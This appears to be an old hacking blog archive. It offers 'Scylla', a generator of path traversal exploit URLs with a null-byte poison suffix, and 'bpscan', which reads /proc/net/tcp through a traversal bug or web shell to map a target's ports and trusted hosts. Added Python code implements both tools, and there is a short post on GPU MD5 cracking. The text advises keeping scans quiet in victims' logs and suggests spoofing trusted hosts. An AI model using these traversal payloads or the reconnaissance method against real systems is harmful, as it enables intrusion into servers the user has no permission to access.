Thursday, October 30, 2008

Scylla v1.0b

Sometimes when you are exploiting a path traversal you can't find the file you want, which can be frustrating.
Scylla lets you generate Triton exploit paths that scan for a target file in multiple locations.

You'll need Java 1.6 to use it, so it will work on any box except for MacOS 10.4.9... Shit happens
when you depend on a monopoly.

If you have any suggestions, bug reports, money, girlz or whatever, PM me or send me a mail.

I hope you find this tool useful guys.

md5sum: 8cbf46a3a563bce13226dbba661fb551
sha1sum: ac4a0faad310658cd3dc603abe26a0bb391d2801

Download:

http://sites.google.com/site/apx808/Home/scylla.jar



Scylla - Triton paths generator
Coded by APX, Buenos Aires 2008
th4 f00k1ng c0wb0ys c0d1ng t3am
apx.808 [@] gmail.com

Contents:

1 - Intro
2 - Use
3 - Thanks
4 - Version history


[1 - Intro]

It's common in path traversal exploits to have trouble
finding a file, httpd.conf anyone?
Well, the aim of this app is to solve that issue.
Scylla will create a list of Triton exploit paths to scan,
one for each of the locations you specify.

[2 - Use]

-Load the xploit data manually or use the "import" option
to import it from a Triton exploit file.

-Add the tag "<PATH>" at the place where you want Scylla to insert
the possible locations. Also, don't forget that Scylla won't do
the traversal for you, so you'll need to provide the ../ either in your
locations file or in the xploit path field; the same goes for
the poison byte. YOU are the one who exploits, Scylla just
makes a repetitive task easier.

Example:

Xploit path: /cgi-bin/vuln.php?file=../../..<PATH>

-Load a file with the possible locations of the file you are
looking for.

-Select a destination file.

-Push "generate".

-Now load the file with Triton and start scanning.
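The steps above, as an added example in Python (this is not Scylla's own code, which is Java and not reproduced on this page). The template, the locations list and the optional depths parameter are assumptions of this example; depths goes beyond Scylla, which leaves the ../ entirely to the user, by emitting one path per traversal depth.

```python
"""Expand a <PATH> exploit template into one path per candidate location."""

TAG = "<PATH>"

# Constructed locations list (hypothetical sample, same format Scylla reads:
# one location per line). Comments and duplicates are dropped on load.
SAMPLE_LOCATIONS = """
# candidate places for httpd.conf
/etc/httpd/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/etc/apache2/apache2.conf
/usr/local/apache2/conf/httpd.conf
/etc/httpd/conf/httpd.conf
"""


def load_locations(text):
    """Return the non-empty, non-comment lines, deduplicated, in file order."""
    seen = set()
    locations = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line in seen:
            continue
        seen.add(line)
        locations.append(line)
    return locations


def generate_paths(template, locations, depths=None):
    """Replace TAG in template with each location.

    With depths=None this mirrors Scylla's behaviour: the traversal (../)
    and any poison byte must already be in the template or in the locations.
    With depths=range(a, b) (an addition of this example, not in Scylla) the
    leading '/' of each absolute location is swapped for n copies of '../',
    producing one entry per depth per location.
    """
    if TAG not in template:
        raise ValueError("template does not contain %s" % TAG)
    if depths is None:
        return [template.replace(TAG, loc) for loc in locations]
    out = []
    for n in depths:
        for loc in locations:
            rel = "../" * n + loc.lstrip("/")
            out.append(template.replace(TAG, rel))
    return out


def write_path_list(paths, dest):
    """Write one path per line, the list the scanner is then fed with."""
    with open(dest, "w") as fh:
        fh.write("\n".join(paths) + "\n")


if __name__ == "__main__":
    locs = load_locations(SAMPLE_LOCATIONS)
    # Scylla style: the user supplies ../ and the poison byte in the template.
    for p in generate_paths("/cgi-bin/vuln.php?file=../../..<PATH>%00", locs):
        print(p)
    # Added generalisation: try depths 1..5 for each location.
    for p in generate_paths("/cgi-bin/vuln.php?file=<PATH>%00", locs, depths=range(1, 6)):
        print(p)
```

Keep the list short and deduplicated: every line becomes one request against the target, which is exactly the log noise the note below warns about.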


NOTE: Be careful how you use this because it can be
VERY NOISY IN THE LOGS.

Keep your simultaneous bots count low and
scan multiple sites if possible.

[3 - Thanks]

I would like to thank Ange, Rudelgurke and my
fellow fooking cowboy Ex0rphine for their testing help.

[4 - Version History]

25-07-2008 - Project starts.

29-07-2008 - v1.0b starts being beta tested.

01-08-2008 - v1.0b Released to public.


Backdoor Port Scanner

1 - Intro


Scanning heavily filtered networks is a slow process: when
the target host drops the packets and doesn't send any reply, Nmap
has to wait for the timeout and then retry up to 10 times before marking the
port as filtered.

Calculating the RTT (Round Trip Time) and ABW (Available Bandwidth)
values correctly can improve Nmap's timing considerably, but a port scan, fast or
slow, will still be noisy.

So the idea is to do a port scan without doing one.

2 - The technique

The basic idea is to use a traversal exploit or a web shell to get the files

/proc/net/tcp
/proc/net/udp

and then feed them to the tool bpscan, which will parse them and show
the results in a human readable way.

The same can be done with the tcp6, udp6 and raw files for IPv6 and raw sockets.

3 - What info can we get doing it

What better way than to see some examples.

We can use it as a normal port scanner; as you will see, bpscan will resolve
the service name.

Port Service
21 ftp
25 smtp
80 http
3306 mysql
5560 Unknown
37237 Unknown
37297 Unknown


Or we can use the "a" flag to see all the entries from the dump without removing
the duplicates.

Port   Service   Remote IP        Remote Port
80     http      93.129.xxx.xxx   3514
3306   mysql     0.0.0.0          0
3306   mysql     72.232.xxx.xxx   40140
5560   Unknown   0.0.0.0          0
37237  Unknown   72.232.xxx.xxx   3306

This last example is abbreviated, or it would be too long.

We can see the IP and port of the remote end.
If we have filtered ports we will be able to know which IPs are allowed to bypass
the firewall, spoof anyone?
The 0.0.0.0:0 entries are the ports in TCP_LISTEN state.

But wait, let's see the same but with remote service resolution...

Port   Service   Remote IP        Remote Port   Remote Service
80     http      93.129.xxx.xxx   3514          must-p2p
3306   mysql     0.0.0.0          0             Unknown
3306   mysql     72.232.xxx.xxx   40140         Unknown
5560   Unknown   0.0.0.0          0             Unknown
37237  Unknown   72.232.xxx.xxx   3306          mysql

The first one has a high remote port that resolves to must-p2p, but that is for sure just the randomly
assigned client port used to connect to our port 80; same with the IP connecting to
mysql from port 40140. When the local side is a listening port, the remote port is ephemeral and its service name means nothing.
But... the last one is interesting: local port 37237 is not one of our listening ports and the remote end is 3306,
so our target is connecting out to a remote mysql... nice.
This is useful to get a better understanding of our target and its network map.
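The parsing described in section 2 and the listen/inbound/outbound reading of the output in section 3, as an added example in Python. This is not bpscan's Perl source (which is not reproduced on this page); the /proc/net/tcp dump, the IP addresses and the small built-in service table are constructed for the example.

```python
"""Parse a dumped /proc/net/tcp and report listening ports and connections."""
import socket
import struct

# Constructed /proc/net/tcp dump (not a real capture). Layout is the kernel's:
# hex IPv4 address (host byte order, so reversed on x86) ':' hex port, then
# the remote end, then the state code. Trailing columns are filler.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 0 100 0 0 10 0
   1: 00000000:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1002 1 0 100 0 0 10 0
   2: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1003 1 0 100 0 0 10 0
   3: 0A01A8C0:0050 0B02815D:0DBA 01 00000000:00000000 00:00000000 00000000     0        0 1004 1 0 100 0 0 10 0
   4: 00000000:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   104        0 1005 1 0 100 0 0 10 0
   5: 0A01A8C0:0CEA 0605E848:9CCC 01 00000000:00000000 00:00000000 00000000   104        0 1006 1 0 100 0 0 10 0
   6: 00000000:15B8 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1007 1 0 100 0 0 10 0
   7: 0A01A8C0:9175 0605E848:0CEA 01 00000000:00000000 00:00000000 00000000    33        0 1008 1 0 100 0 0 10 0
"""

# Socket state codes as used in /proc/net/tcp.
TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV",
              "04": "FIN_WAIT1", "05": "FIN_WAIT2", "06": "TIME_WAIT",
              "07": "CLOSE", "08": "CLOSE_WAIT", "09": "LAST_ACK",
              "0A": "LISTEN", "0B": "CLOSING"}

# Small built-in table so the example is deterministic without /etc/services
# (an assumption of this example); other ports go through getservbyport.
KNOWN_SERVICES = {21: "ftp", 25: "smtp", 80: "http", 3306: "mysql"}


def decode_addr(field):
    """'0A01A8C0:0050' -> ('192.168.1.10', 80) on a little-endian host dump."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def service_name(port):
    """Service name for a TCP port, 'Unknown' when nothing resolves."""
    if port in KNOWN_SERVICES:
        return KNOWN_SERVICES[port]
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return "Unknown"


def parse_proc_net_tcp(text):
    """Return one dict per socket line; the header line is skipped."""
    sockets = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].endswith(":"):
            continue  # header or malformed line
        lip, lport = decode_addr(fields[1])
        rip, rport = decode_addr(fields[2])
        sockets.append({"local_ip": lip, "local_port": lport,
                        "remote_ip": rip, "remote_port": rport,
                        "state": TCP_STATES.get(fields[3], fields[3])})
    return sockets


def listening_ports(sockets):
    """Distinct LISTEN ports, like bpscan's default output (a 'select distinct')."""
    return sorted({s["local_port"] for s in sockets if s["state"] == "LISTEN"})


def classify_connections(sockets):
    """Tag each non-LISTEN socket as 'inbound' (our side is a listening port,
    so the remote port is just an ephemeral client port) or 'outbound' (our
    side is ephemeral, so the remote port is the service the target talks to).
    Only outbound remote ports get a service name; the rest is 'ephemeral'."""
    listen = set(listening_ports(sockets))
    rows = []
    for s in sockets:
        if s["state"] == "LISTEN":
            continue
        direction = "inbound" if s["local_port"] in listen else "outbound"
        remote_svc = service_name(s["remote_port"]) if direction == "outbound" else "ephemeral"
        rows.append((direction, s["local_port"], s["remote_ip"], s["remote_port"], remote_svc))
    return rows


if __name__ == "__main__":
    socks = parse_proc_net_tcp(SAMPLE_PROC_NET_TCP)
    print("Port   Service")
    for p in listening_ports(socks):
        print("%-6d %s" % (p, service_name(p)))
    print()
    for row in classify_connections(socks):
        print("%-8s local %-5d  remote %s:%d  (%s)" % row)
```

The direction test is what keeps must-p2p style false positives out: a remote port is only worth resolving when the local port is not one we listen on. The same parser works on a dumped tcp6 file if decode_addr is extended to 128-bit addresses.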

4 - The tool

The tool is coded in Perl; I made it for personal use but decided to share it.

Its use is easy, check the manual.

Options:
-h Shows this really useful help
-i Defines the input file; if it isn't defined, bpscan will read stdin
-f Sets the flags

Valid Flags:
a Shows all the entries, including the remote ip and port where the socket connects
r Resolve remote service

Examples:
bpscan -i=tcp.txt -f=ar
cat /proc/net/tcp | bpscan


5 - Conclusion

Ok guys, I hope you find it useful.
I would like to thank Rudelgurke for his helpful info on Linux and BSD inner workings.
For any comment, suggestion or idea, contact me at apx[dot]808[at]gmail[dot]com

6 - Download

http://sites.google.com/site/apx808/Home/bpscan.zip

7 - Extra

From a few comments I received I think there are some guys who don't really understand what the tool is for.
So, here are 5 great reasons to use bpscan.

1 - If you only have a traversal xploit, you can search for open ports to discover new attack
vectors.
2 - If you have a web shell, you can get the same results using netstat, but you'll need to parse
the info yourself and you can't get each open port only once, like a "select distinct".
3 - bpscan sees the ports from behind, so if you have an open port behind a firewall you'll see
it too.
4 - If you see an incoming connection to a port you can't connect to, seeing its IP can allow you to
guess the firewall rule, or discover a trusted host.
5 - You can see your target's outgoing connections, and what service they are for, so you can
gain a better understanding of your target's network map, other targets or new attack vectors.


Awesomeness

Tuesday, October 28, 2008

Lightning Hash Cracker

I've been testing Elcomsoft's LHC.
Basically it's a password cracker that uses CUDA technology to churn out MD5 hashes like crazy.

English mode on: (I warned you about it)

Basically the Nvidia chip is a parallel processor for mathematical operations. And it gets used like in the 386 days, when some machines had a math coprocessor.



In the graphic above you can see that it crushes a normal processor's performance in math ops; that's because the chip is specifically designed to do the same math ops on different data simultaneously at really high speed.

Ok, some guys realized they could use that processing power to do other things instead of rendering Doom 3 monsters, but they had to go through the normal graphics API, and that was a pain in the ass.

So the Nvidia guys created a new API just for using the board's parallel processing power for simulations or, in this case, to generate hashes; the API is called CUDA (Compute Unified Device Architecture).

Actually I don't know what those commies registered, but using that API, ANY math op that is applied to multiple data items can be accelerated.


Well, above is something I had posted a while ago, October 30th 2007, how cool, that was almost a year ago...
Anyway, the point is that back then the Russians, as usual, already had private toolz to bruteforce MD5; we think we're clever, but by the time we get going the Russians have long since been there and back, maybe some day I'll get around to talking about this...

Let's look at a graph of the hashes/second that CUDA technology gives us depending on which card we have...



And now let's get our feet wet a bit



Here on this page you can download LHC 4 free http://www.elcomsoft.com/lhc.html
I was trying it out for a while; I have an Nvidia 8600 GTX and it runs nicely, I get an average of 70.5 M hashes with an Intel Core2Duo 8400E.
I'll tell you that even though it uses the GPU, it gives the CPU a considerable beating too...

Friday, October 24, 2008

Inauguration



I had created this blog a couple of months ago but never brought myself to write anything.
What can you expect?
Well, as the name says, my ravings, ramblings, brain lunacies. Generally they will be about "computer insecurity", as I like to call it, or anything I think is worth sharing.

All things considered, I think my Spanish is pretty good, so you won't find any extreme blunders, except that I don't use accent marks anywhere; it's also likely that sometimes I'll post things in English... And well, I can't be bothered to write the same thing in two languages, so I default to English.

About my nick...
It's pronounced "eiphex" or "apex" depending on how yankee you want to sound, but it is definitely not pronounced "a pe equis", spelling it out like that in Spanish sucks.
When I picked it I was really hooked on the track "Come to daddy" by Aphex Twin; some time later I felt like being trendy and shortened it to 3 letters. I'll leave you the famous video, it's nuts, that's why I like it so much hehe

Well, bye

Test

Testing 1,2,3
The flying cat


